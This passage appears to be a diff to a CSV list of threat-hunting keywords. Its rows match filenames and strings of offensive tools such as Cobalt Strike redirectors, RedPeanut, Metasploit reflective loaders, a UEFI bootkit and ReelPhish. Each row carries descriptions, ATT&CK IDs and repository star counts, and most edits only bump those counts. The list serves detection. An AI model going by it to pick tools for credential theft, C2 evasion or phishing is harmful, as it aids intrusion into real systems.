Labs RedHunt OS aims to be a one stop shop for all your threat emulation and threat hunting needs by integrating attackers arsenal as well as defenders toolkit to actively identify the threats in your environment","T1583 - T1057 - T1016","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/redhuntlabs/RedHunt-OS","1","1","N/A","N/A","10","1170","185","2020-07-13T04:54:49Z","2018-03-14T19:31:16Z" "*redis-rce*","offensive_tool_keyword","redis-rce","A exploit for Redis 4.x/5.x RCE. inspired by Redis post-exploitation.","T1210 - T1211 - T1021 - T1059","TA0002 - TA0011 - TA0003","N/A","N/A","Exploitation tools","https://github.com/Ridter/redis-rce","1","0","N/A","N/A","9","856","216","2021-11-30T14:55:59Z","2019-07-08T14:05:30Z" -"*redlotus.efi*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","448","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" +"*redlotus.efi*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","449","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" "*RedPeanut Smb server started*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanut.Models*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*redpeanut.pfx*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" @@ -15684,52 +15863,52 @@ "*redskal/SharpAzbelt*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","1","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*redsocks-fw.sh stop*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z" "*Red-Team-Infrastructure-Wiki.*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" -"*Red-Teaming-Toolkit*","offensive_tool_keyword","Red-Teaming-Toolkit","A collection of open source and commercial tools that aid in red team operations. This repository will help you during red team engagement. If you want to contribute to this list send me a pull request","T1210 - T1211 - T1212 - T1547","TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/infosecn1nja/Red-Teaming-Toolkit","1","1","N/A","N/A","10","7958","2071","2023-06-01T08:38:39Z","2018-04-26T13:35:09Z" +"*Red-Teaming-Toolkit*","offensive_tool_keyword","Red-Teaming-Toolkit","A collection of open source and commercial tools that aid in red team operations. This repository will help you during red team engagement. If you want to contribute to this list send me a pull request","T1210 - T1211 - T1212 - T1547","TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/infosecn1nja/Red-Teaming-Toolkit","1","1","N/A","N/A","10","7962","2070","2023-06-01T08:38:39Z","2018-04-26T13:35:09Z" "*RedTeamOperations*","offensive_tool_keyword","Github Username","Red team exploitation tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/RedTeamOperations","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*RedWarden.py*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" -"*RedWarden.test*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" -"*redwarden_access.log*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" -"*redwarden_redirector.log*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*RedWarden.py*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*RedWarden.test*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*redwarden_access.log*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*redwarden_redirector.log*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*ReelPhish*","offensive_tool_keyword","ReelPhish","ReelPhish consists of two components: the phishing site handling code and this script. The phishing site can be designed as desired. Sample PHP code is provided in /examplesitecode. The sample code will take a username and password from a HTTP POST request and transmit it to the phishing script. The phishing script listens on a local port and awaits a packet of credentials. Once credentials are received. the phishing script will open a new web browser instance and navigate to the desired URL (the actual site where you will be entering a users credentials). Credentials will be submitted by the web browser","T1566 - T1114 - T1071 - T1547 - T1546","TA0001 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/fireeye/ReelPhish","1","0","N/A","N/A","5","493","156","2023-08-11T01:40:07Z","2018-02-01T20:35:11Z" "*reflct_dll_inject.exe*","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","10","7","644","119","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" "*reflective_assembly_minified.ps1*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","","N/A","","","" -"*reflective_dll.dll*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" -"*reflective_dll.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*reflective_dll.dll*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*reflective_dll.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*reflective_dll.x64.dll*","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","10","10","148","21","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" -"*reflective_dll.x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*reflective_dll_inject*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*reflective_pe_loader.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*reflective_dll.x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*reflective_dll_inject*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*reflective_pe_loader.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better 